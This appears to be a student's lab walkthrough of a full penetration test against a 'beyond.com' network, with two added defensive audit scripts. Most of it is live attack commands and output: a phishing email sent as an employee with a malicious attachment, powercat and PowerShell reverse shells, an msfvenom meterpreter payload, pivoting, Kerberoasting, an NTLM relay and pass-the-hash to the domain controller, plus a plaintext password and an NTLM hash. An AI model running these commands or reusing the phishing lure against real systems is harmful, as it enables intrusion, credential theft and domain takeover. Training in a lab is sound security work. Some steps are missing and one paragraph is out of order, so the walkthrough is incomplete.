# Setting up a basic directory structure for the assessment
kali@kali:~$ mkdir beyond
kali@kali:~$ cd beyond
kali@kali:~/beyond$ mkdir mailsrv1
kali@kali:~/beyond$ mkdir websrv1
kali@kali:~/beyond$ touch creds.txt
Documenting our findings is a crucial process for every penetration test. For this Module, we'll store results in the basic work environment we just set up. However, Markdown editors, such as Obsidian, have become quite popular for documenting findings and data in real assessments as they are application-independent and contain functions that will simplify report writing and collaboration.
Beginning with a port scan:
# We'll use -sV to enable service and version detection as well as -sC to use Nmap's default scripts. In addition, we'll enter -oN to create an output file containing the scan results.
kali@kali:~/beyond$ sudo nmap -sC -sV -oN mailsrv1/nmap 192.168.50.242
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-29 08:53 EDT
Nmap scan report for 192.168.50.242
Host is up (0.11s latency).
Not shown: 992 closed tcp ports (reset)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: MAILSRV1, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: UIDL USER TOP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: IMAP4 CHILDREN OK ACL IMAP4rev1 completed CAPABILITY NAMESPACE IDLE RIGHTS=texkA0001 SORT QUOTA
445/tcp open microsoft-ds?
587/tcp open smtp hMailServer smtpd
| smtp-commands: MAILSRV1, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
Service Info: Host: MAILSRV1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-09-29T12:54:00
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: 21s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.95 seconds
In a real penetration test, we would also use passive information gathering techniques such as Google Dorks and leaked password databases to obtain additional information. This would potentially provide us with usernames, passwords, and sensitive information.
Even if we had found a vulnerability with a matching exploit providing the code execution, we should not skip the remaining enumeration steps. While we may get access to the target system, we could potentially miss out on vital data or information for other services and systems.
Trying to bust some directories:
# We'll enter dir to use directory enumeration mode, -u for the URL, -w for a wordlist, and -x for file types we want to identify. For this example, we'll enter txt, pdf, and config to identify potential documents or configuration files. In addition, we'll use -o to create an output file.
kali@kali:~/beyond$ gobuster dir -u http://192.168.50.242 -w /usr/share/wordlists/dirb/common.txt -o mailsrv1/gobuster -x txt,pdf,config
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.50.242
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,pdf,config
[+] Timeout: 10s
===============================================================
2022/09/29 11:12:27 Starting gobuster in directory enumeration mode
===============================================================
===============================================================
2022/09/29 11:16:00 Finished
===============================================================
Not every enumeration technique needs to provide actionable results. In the initial information gathering phase, it is important to perform a variety of enumeration methods to get a complete picture of a system.
WEBSRV1
In a real penetration test, we could scan MAILSRV1 and WEBSRV1 in parallel, meaning we could perform the scans at the same time to save valuable time for the client. If we do so, it's vital to perform the scans in a structured way so as not to mix up results or miss findings.
Nmap scanning new target:
kali@kali:~/beyond$ sudo nmap -sC -sV -oN websrv1/nmap 192.168.50.244
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-29 11:18 EDT
Nmap scan report for 192.168.50.244
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4f:c8:5e:cd:62:a0:78:b4:6e:d8:dd:0e:0b:8b:3a:4c (ECDSA)
|_ 256 8d:6d:ff:a4:98:57:82:95:32:82:64:53:b2:d7:be:44 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
| http-title: BEYOND Finances – We provide financial freedom
|_Requested resource was http://192.168.50.244/main/
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-generator: WordPress 6.0.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.51 seconds
Using whatweb to determine the technology stack of the webpage:
Using wpscan to enumerate wordpress vulnerabilities:
# To perform the scan without an API key, we'll provide the URL of the target for --url, set the plugin detection to aggressive, and specify to enumerate all popular plugins by entering p as an argument to --enumerate. In addition, we'll use -o to create an output file.
kali@kali:~/beyond$ wpscan --url http://192.168.50.244 --enumerate p --plugins-detection aggressive -o websrv1/wpscan
kali@kali:~/beyond$ cat websrv1/wpscan
...
[i] Plugin(s) Identified:
[+] akismet
| Location: http://192.168.50.244/wp-content/plugins/akismet/
| Latest Version: 5.0
| Last Updated: 2022-07-26T16:13:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.50.244/wp-content/plugins/akismet/, status: 500
|
| The version could not be determined.
[+] classic-editor
| Location: http://192.168.50.244/wp-content/plugins/classic-editor/
| Latest Version: 1.6.2
| Last Updated: 2021-07-21T22:08:00.000Z
...
[+] contact-form-7
| Location: http://192.168.50.244/wp-content/plugins/contact-form-7/
| Latest Version: 5.6.3 (up to date)
| Last Updated: 2022-09-01T08:48:00.000Z
...
[+] duplicator
| Location: http://192.168.50.244/wp-content/plugins/duplicator/
| Last Updated: 2022-09-24T17:57:00.000Z
| Readme: http://192.168.50.244/wp-content/plugins/duplicator/readme.txt
| [!] The version is out of date, the latest version is 1.5.1
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.50.244/wp-content/plugins/duplicator/, status: 403
|
| Version: 1.3.26 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.50.244/wp-content/plugins/duplicator/readme.txt
[+] elementor
| Location: http://192.168.50.244/wp-content/plugins/elementor/
| Latest Version: 3.7.7 (up to date)
| Last Updated: 2022-09-20T14:51:00.000Z
...
[+] wordpress-seo
| Location: http://192.168.50.244/wp-content/plugins/wordpress-seo/
| Latest Version: 19.7.1 (up to date)
| Last Updated: 2022-09-20T14:10:00.000Z
...
Using searchsploit to search for vulnerabilities in the discovered plugins, starting with the outdated duplicator plugin:
This shows that john has valid credentials for MAILSRV1 and that the domain name is beyond.com; reviewing the Nmap results shows there likely aren't any other services on which we can use these validated credentials.
This leaves us with two options:
1. Further enumerate SMB on MAILSRV1, checking for sensitive data on accessible shares.
2. Prepare a malicious attachment and send a phishing email as john to daniela and marcus.
Copying powercat to our current directory, hosting it via Python's http.server, and starting a netcat listener:
kali@kali:~/beyond$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
kali@kali:~/beyond$ python3 -m http.server 8000 &
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
kali@kali:~/beyond$ nc -nvlp 4444 &
listening on [any] 4444 ...
Using swaks to send the email:
# Creating the body in body.txt
kali@kali:~/beyond$ cat body.txt
Hey!
I checked WEBSRV1 and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons.
On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within. Thanks!
John
# Now we are ready to build the swaks command to send the emails. We'll provide daniela@beyond.com and marcus@beyond.com as recipients of the email to -t, john@beyond.com as name on the email envelope (sender) to --from, and the Windows Library file to --attach. Next, we'll enter --suppress-data to summarize information regarding the SMTP transactions. For the email subject and body, we'll provide Subject: Staging Script to --header and body.txt to --body. In addition, we'll enter the IP address of MAILSRV1 for --server. Finally, we'll add -ap to enable password authentication.
kali@kali:~/beyond$ sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
Username: john
Password: dqsTwTpZPn#nL
=== Trying 192.168.50.242:25...
=== Connected to 192.168.50.242.
<- 220 MAILSRV1 ESMTP
-> EHLO kali
<- 250-MAILSRV1
<- 250-SIZE 20480000
<- 250-AUTH LOGIN
<- 250 HELP
-> AUTH LOGIN
<- 334 VXNlcm5hbWU6
-> am9obg==
<- 334 UGFzc3dvcmQ6
-> ZHFzVHdUcFpQbiNuTA==
<- 235 authenticated.
-> MAIL FROM:<john@beyond.com>
<- 250 OK
-> RCPT TO:<marcus@beyond.com>
<- 250 OK
-> DATA
<- 354 OK, send.
-> 36 lines sent
<- 250 Queued (1.088 seconds)
-> QUIT
<- 221 goodbye
=== Connection closed with remote host.
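As an added defensive check that is not part of the original notes: the swaks transcript above shows hMailServer accepting AUTH LOGIN on port 25 without offering STARTTLS, so the base64 in the 334/response lines is merely encoded, not encrypted. This script audits a transcript in swaks' `->`/`<-` format; the two transcripts are constructed (the password is a placeholder, the mail host in the second one is made up).

```python
"""Audit an SMTP session transcript (swaks '->' client / '<-' server lines):
was STARTTLS offered and used, and was AUTH LOGIN performed in the clear?"""
import base64
import binascii

# Constructed from the exchange in the notes; password replaced by a placeholder.
CLEARTEXT_TRANSCRIPT = """\
<- 220 MAILSRV1 ESMTP
-> EHLO kali
<- 250-MAILSRV1
<- 250-SIZE 20480000
<- 250-AUTH LOGIN
<- 250 HELP
-> AUTH LOGIN
<- 334 VXNlcm5hbWU6
-> am9obg==
<- 334 UGFzc3dvcmQ6
-> c2VjcmV0
<- 235 authenticated.
-> MAIL FROM:<john@beyond.com>
"""

# Constructed counter-example: the server offers STARTTLS and the client uses it
# before authenticating (swaks still prints the decrypted commands afterwards).
TLS_TRANSCRIPT = """\
<- 220 mail.example ESMTP
-> EHLO kali
<- 250-mail.example
<- 250-STARTTLS
<- 250 AUTH LOGIN
-> STARTTLS
<- 220 Go ahead
-> AUTH LOGIN
<- 334 VXNlcm5hbWU6
-> am9obg==
<- 334 UGFzc3dvcmQ6
-> c2VjcmV0
<- 235 authenticated.
"""


def _b64(text):
    """Decode a base64 token; return '' if it is not valid base64."""
    try:
        return base64.b64decode(text.strip()).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return ""


def audit_smtp_transcript(transcript):
    """Return a small report dict; the password is decoded but never stored."""
    report = {"starttls_offered": False, "starttls_used": False,
              "cleartext_auth_login": False, "username": None}
    in_auth = False
    last_challenge = ""
    for line in transcript.splitlines():
        if line.startswith("<- 250") and "STARTTLS" in line.upper():
            report["starttls_offered"] = True
        elif line.startswith("-> STARTTLS"):
            report["starttls_used"] = True
        elif line.startswith("-> AUTH LOGIN"):
            in_auth = True
        elif in_auth and line.startswith("<- 334 "):
            last_challenge = _b64(line[7:])          # "Username:" / "Password:"
        elif in_auth and line.startswith("-> "):
            value = _b64(line[3:])
            if last_challenge.lower().startswith("username"):
                report["username"] = value
            # Credentials sent before STARTTLS are readable on the wire.
            if not report["starttls_used"]:
                report["cleartext_auth_login"] = True
        elif in_auth and line.startswith("<- 235"):
            in_auth = False
    return report
```

On the notes' transcript the report flags cleartext AUTH LOGIN for user john with no STARTTLS offered; the fix on the server side is to require STARTTLS (or submission over TLS on 587/465) before accepting AUTH.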
Waiting a few moments...
listening on [any] 4444 ...
connect to [192.168.119.5] from (UNKNOWN) [192.168.50.242] 64264
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\System32\WindowsPowerShell\v1.0> whoami
whoami
beyond\marcus
PS C:\Windows\System32\WindowsPowerShell\v1.0> hostname
hostname
CLIENTWK1
PS C:\Windows\System32\WindowsPowerShell\v1.0> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.6.243
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.6.254
PS C:\Windows\System32\WindowsPowerShell\v1.0>
winPEAS is not always correct; validate its findings when you can:
// Result from winPEAS
╔══════════╣ Basic System Information
È Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
Hostname: CLIENTWK1
Domain Name: beyond.com
ProductName: Windows 10 Pro
EditionID: Professional
// Result from systeminfo
PS C:\Users\marcus> systeminfo
systeminfo
Host Name: CLIENTWK1
OS Name: Microsoft Windows 11 Pro
OS Version: 10.0.22000 N/A Build 22000
Using the network information and known hosts to update our computer.txt:
╔══════════╣ Network Ifaces and known hosts
È The masks are only for the IPv4 addresses
Ethernet0[00:50:56:8A:0F:27]: 172.16.6.243 / 255.255.255.0
Gateways: 172.16.6.254
DNSs: 172.16.6.240
Known hosts:
169.254.255.255 00-00-00-00-00-00 Invalid
172.16.6.240 00-50-56-8A-08-34 Dynamic
172.16.6.254 00-50-56-8A-DA-71 Dynamic
172.16.6.255 FF-FF-FF-FF-FF-FF Static
...
╔══════════╣ DNS cached --limit 70--
Entry Name Data
dcsrv1.beyond.com DCSRV1.beyond.com 172.16.6.240
mailsrv1.beyond.com mailsrv1.beyond.com 172.16.6.254
kali@kali:~/beyond$ cat computer.txt
172.16.6.240 - DCSRV1.BEYOND.COM
-> Domain Controller
172.16.6.254 - MAILSRV1.BEYOND.COM
-> Mail Server
-> Dual Homed Host (External IP: 192.168.50.242)
172.16.6.243 - CLIENTWK1.BEYOND.COM
-> User _marcus_ fetches emails on this machine
No privilege escalation vector found, moving on to enumerating the AD environment and its objects.
PS C:\Users\marcus> iwr -uri http://192.168.119.5:8000/SharpHound.ps1 -Outfile SharpHound.ps1
iwr -uri http://192.168.119.5:8000/SharpHound.ps1 -Outfile SharpHound.ps1
PS C:\Users\marcus> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Users\marcus> . .\SharpHound.ps1
. .\SharpHound.ps1
PS C:\Users\marcus> Invoke-BloodHound -CollectionMethod All
Invoke-BloodHound -CollectionMethod All
2022-10-10T07:24:34.3593616-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2022-10-10T07:24:34.5781410-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-10-10T07:24:34.5937984-07:00|INFORMATION|Initializing SharpHound at 7:24 AM on 10/10/2022
2022-10-10T07:24:35.0781142-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-10-10T07:24:35.3281888-07:00|INFORMATION|Beginning LDAP search for beyond.com
2022-10-10T07:24:35.3906114-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-10-10T07:24:35.3906114-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-10-10T07:25:06.1421842-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 92 MB RAM
2022-10-10T07:25:21.6307386-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2022-10-10T07:25:21.6932468-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2022-10-10T07:25:21.8338601-07:00|INFORMATION|Status: 98 objects finished (+98 2.130435)/s -- Using 103 MB RAM
2022-10-10T07:25:21.8338601-07:00|INFORMATION|Enumeration finished in 00:00:46.5180822
2022-10-10T07:25:21.9414294-07:00|INFORMATION|Saving cache with stats: 57 ID to type mappings.
58 name to SID mappings.
1 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2022-10-10T07:25:21.9570748-07:00|INFORMATION|SharpHound Enumeration Completed at 7:25 AM on 10/10/2022! Happy Graphing!
Listing files to locate the zip archive with our enumeration results:
PS C:\Users\marcus> dir
dir
Directory: C:\Users\marcus
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/29/2022 1:49 AM Contacts
d-r--- 9/29/2022 1:49 AM Desktop
d-r--- 9/29/2022 4:37 AM Documents
d-r--- 9/29/2022 4:33 AM Downloads
d-r--- 9/29/2022 1:49 AM Favorites
d-r--- 9/29/2022 1:49 AM Links
d-r--- 9/29/2022 1:49 AM Music
d-r--- 9/29/2022 1:50 AM OneDrive
d-r--- 9/29/2022 1:50 AM Pictures
d-r--- 9/29/2022 1:49 AM Saved Games
d-r--- 9/29/2022 1:50 AM Searches
d-r--- 9/29/2022 4:30 AM Videos
-a---- 10/10/2022 7:25 AM 11995 20221010072521_BloodHound.zip
-a---- 10/10/2022 7:23 AM 1318097 SharpHound.ps1
-a---- 10/10/2022 5:02 AM 1936384 winPEAS.exe
-a---- 10/10/2022 7:25 AM 8703 Zjc5OGNlNTktMzQ0Ni00YThkLWEzZjEtNWNhZGJlNzdmODZl.bin
Starting an SMB server on our Kali machine to transfer the file:
kali@kali:~/Downloads$ sudo impacket-smbserver test . -smb2support -username test -password test
Copying the .zip over:
PS C:\Users\marcus> net use m: \\192.168.119.5\test /user:test test
The command completed successfully.
PS C:\Users\marcus> copy 20221010072521_BloodHound.zip m:\
Clicking on each object shown will display information about the object:
DCSRV1.BEYOND.COM - Windows Server 2022 Standard
INTERNALSRV1.BEYOND.COM - Windows Server 2022 Standard
MAILSRV1.BEYOND.COM - Windows Server 2022 Standard
CLIENTWK1.BEYOND.COM - Windows 11 Pro
A new host was discovered, let's use nslookup to find its IP address:
We could have also used PowerView or LDAP queries to obtain all of this information. However, in most penetration tests, we want to use BloodHound first as the output of the other methods can be quite overwhelming. It's an effective and powerful tool to gain a deeper understanding of the Active Directory environment in a short amount of time. We can also use raw or pre-built queries to identify highly complex attack vectors and display them in an interactive graphical view.
Services and Sessions
Cypher is a querying language, so we can build a relationship query with the following syntax: (NODES)-[:RELATIONSHIP]->(NODES).
In our example, we'll query for active sessions on computers by users:
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p
We see Beccy, a domain admin, has an active session on MAILSRV1. We may be able to extract their NTLM hash if we get privileged access on MAILSRV1. BloodHound uses SIDs to represent local accounts; in this case the RID 500 implies there is an active session of the local Administrator on INTERNALSRV1.
Now we'll identify all kerberoastable users in the domain with the List all Kerberoastable Accounts pre-built query in BloodHound.
The krbtgt user account acts as the service account for the Key Distribution Center (KDC) and is responsible for encrypting and signing Kerberos tickets. When a domain is set up, a password is randomly generated for this account, making a password attack unfeasible. Therefore, we can often safely skip krbtgt in the context of Kerberoasting.
Even though we've found the SPN for daniela indicating a web server is running on INTERNALSRV1, we should collect all information, prioritize it, and then perform potential attacks.
Creating a staged meterpreter TCP reverse shell as an executable:
kali@kali:~/beyond$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.119.5 LPORT=443 -f exe -o met.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: met.exe
Starting a multi/handler listener with corresponding settings with ExitOnSession set to false so we don't need to restart the listener every time:
kali@kali:~/beyond$ sudo msfconsole -q
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.119.5
LHOST => 192.168.119.5
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started HTTPS reverse handler on https://192.168.119.5:443
Downloading met.exe on CLIENTWK1 so we get our session:
Catching our session and using multi/manage/autoroute and auxiliary/server/socks_proxy to create a SOCKS5 proxy to access the internal network from our Kali box:
[*] Meterpreter session 1 opened (192.168.119.5:443 -> 192.168.50.242:64234) at 2022-10-11 07:05:22 -0400
msf6 exploit(multi/handler) > use multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set session 1
session => 1
msf6 post(multi/manage/autoroute) > run
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: windows
[*] Running module against CLIENTWK1
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.16.6.0/255.255.255.0 from host's routing table.
[*] Post module execution completed
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set VERSION 5
VERSION => 5
msf6 auxiliary(server/socks_proxy) > run -j
[*] Auxiliary module running as background job 2.
Update our /etc/proxychains4.conf to use the correct settings:
CrackMapExec version 5.4.0 may throw the error The NETBIOS connection with the remote host is timed out for DCSRV1 or doesn't provide any output at all. Version 5.4.1 contains a fix to address this issue.
Because MAILSRV1 and INTERNALSRV1 have SMB signing set to False, we may be able to perform relay attacks if we can force an authentication request.
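The signing state that makes relaying possible is visible in Nmap's smb2-security-mode host script output (see "Message signing enabled but not required" in the MAILSRV1 scan). As an added audit check that is not part of the original notes, this script parses `-oN` output and lists hosts that accept unsigned SMB sessions; the sample scan text is constructed from the notes' output format, with the internal hosts' signing states made up for illustration.

```python
"""Find hosts whose Nmap smb2-security-mode result shows SMB signing is not
required, i.e. hosts that would accept a relayed NTLM authentication."""
import re

# Constructed sample in Nmap normal (-oN) format; 192.168.50.242 mirrors the
# notes' MAILSRV1 scan, the two internal hosts are made up for illustration.
SAMPLE_NMAP = """\
Nmap scan report for 192.168.50.242
Host is up (0.11s latency).
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
|_clock-skew: 21s

Nmap scan report for dcsrv1.beyond.com (172.16.6.240)
Host is up (0.20s latency).
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 172.16.6.241
Host is up (0.21s latency).
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing disabled and not required
"""

# "Nmap scan report for 1.2.3.4" or "Nmap scan report for name (1.2.3.4)"
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?")
# Script output lines start with "|" or "|_", then the signing statement.
SIGNING_RE = re.compile(r"^\|_?\s*Message signing (.+)$")


def parse_smb_signing(nmap_text):
    """Map each scanned IP to its smb2-security-mode signing statement."""
    signing = {}
    host = None
    for line in nmap_text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = SIGNING_RE.match(line)
        if m and host:
            signing[host] = m.group(1).strip()
    return signing


def signing_not_required_hosts(nmap_text):
    """Hosts that accept unsigned sessions: candidates for relay, and the ones
    where 'Digitally sign communications (always)' should be enforced."""
    return sorted(ip for ip, state in parse_smb_signing(nmap_text).items()
                  if "not required" in state)
```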
Performing an Nmap scan on the targets. We must specify -sT to perform a TCP connect scan; otherwise Nmap will not work over Proxychains:
kali@kali:~/beyond$ sudo proxychains -q nmap -sT -oN nmap_servers -Pn -p 21,80,443 172.16.6.240 172.16.6.241 172.16.6.254
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-11 07:17 EDT
Nmap scan report for 172.16.6.240
Host is up (2.2s latency).
PORT STATE SERVICE
21/tcp closed ftp
80/tcp closed http
443/tcp closed https
Nmap scan report for internalsrv1.beyond.com (172.16.6.241)
Host is up (0.21s latency).
PORT STATE SERVICE
21/tcp closed ftp
80/tcp open http
443/tcp open https
Nmap scan report for 172.16.6.254
Host is up (0.20s latency).
PORT STATE SERVICE
21/tcp closed ftp
80/tcp open http
443/tcp closed https
Nmap done: 3 IP addresses (3 hosts up) scanned in 14.34 seconds
Use chisel v1.7.7 (go1.17.6). Future versions have weird issues.
Using chisel to tunnel our traffic through CLIENTWK1 to INTERNALSRV1:
I ran into several issues with chisel here. In my case, I just stopped using it and resorted to proxychains firefox & and went directly to http://172.16.6.241
With chisel connected, we can now browse to port 80 on 172.16.6.241 via port 80 on our Kali machine (127.0.0.1) by using Firefox:
Attempting to browse to http://127.0.0.1/wordpress/wp-admin results in an Unable to connect error due to name resolution for the internal server. Adding it to our hosts file will help here:
kali@kali:~/beyond$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
...
127.0.0.1 internalsrv1.beyond.com
# In my case it was:
# 172.16.6.241 internalsrv1.beyond.com
...
Now we can properly get to the Administrator login page of WordPress on INTERNALSRV1. Trying our current collection of credentials, as well as common passwords like admin:admin, fails to get us in.
Attacking an Internal Web Application
Speak Kerberoast and Enter
Moving on to Kerberoasting using our one set of valid credentials:
With the cracked password, let's try and login to WordPress at /wp-admin via our forwarded port:
🎉 We're in! 🎉
Abuse a WordPress Plugin for a Relay Attack
First let's gather information in WordPress, starting with configured users:
Checking out the only enabled plugin:
Potential attack vectors:
1. Attempt to upload a malicious WordPress plugin (web shell or reverse shell).
2. Attempt to force an authentication via the Backup directory path for a relay attack, since SMB signing is disabled.
Because the second vector results in code execution and provides a potential vector to achieve a goal of the penetration test, we'll attempt this one first.
kali@kali:~/beyond$ sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.242 -c "powershell -enc JABjAGwAaQ..."
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Protocol Client SMTP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
Setting up our reverse shell listener:
kali@kali:~/beyond$ nc -nvlp 9999
listening on [any] 9999 ...
Save the modified directory path by scrolling down and clicking on Save. This should cause the WordPress plugin to authenticate to our ntlmrelayx listener.
...
[*] Authenticating against smb://192.168.50.242 as INTERNALSRV1/ADMINISTRATOR SUCCEED
...
[*] Service RemoteRegistry is in stopped state
...
[*] Starting service RemoteRegistry
...
[*] Executed specified command on host: 192.168.50.242
...
[*] Stopping service RemoteRegistry
We now see the reverse shell connection:
connect to [192.168.119.5] from (UNKNOWN) [192.168.50.242] 50063
whoami
nt authority\system
PS C:\Windows\system32> hostname
MAILSRV1
PS C:\Windows\system32>
Interacting with the session and spawning a new powershell command line shell:
msf6 post(multi/manage/autoroute) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > shell
Process 416 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.1006]
(c) Microsoft Corporation. All rights reserved.
C:\Users\Administrator> powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Users\Administrator>
We got beccy's (a domain admin) password! Time to get over to the DC.
Lateral Movement
Because we have the clear text password and NTLM hash for beccy, we can use impacket-psexec to get an interactive shell on DCSRV1. Either would work; in this example we use the hash:
kali@kali:~$ proxychains -q impacket-psexec -hashes 00000000000000000000000000000000:f0397ec5af49971f6efbdb07877046b3 beccy@172.16.6.240
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 172.16.6.240.....
[*] Found writable share ADMIN$
[*] Uploading file CGOrpfCz.exe
[*] Opening SVCManager on 172.16.6.240.....
[*] Creating service tahE on 172.16.6.240.....
[*] Starting service tahE.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.1006]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DCSRV1
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.6.240
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.6.254
Penetration test complete! Time to write a report!
Setting up impacket-ntlmrelayx. We'll use --no-http-server and -smb2support to disable the HTTP server and enable SMB2 support. We'll specify the external address for MAILSRV1, 192.168.50.242, as target for the relay attack. By entering the external address, we don't have to proxy our relay attack via Proxychains. Finally, we'll base64-encode a PowerShell reverse shell that will connect back to our Kali machine on port 9999 and provide it as a command to -c: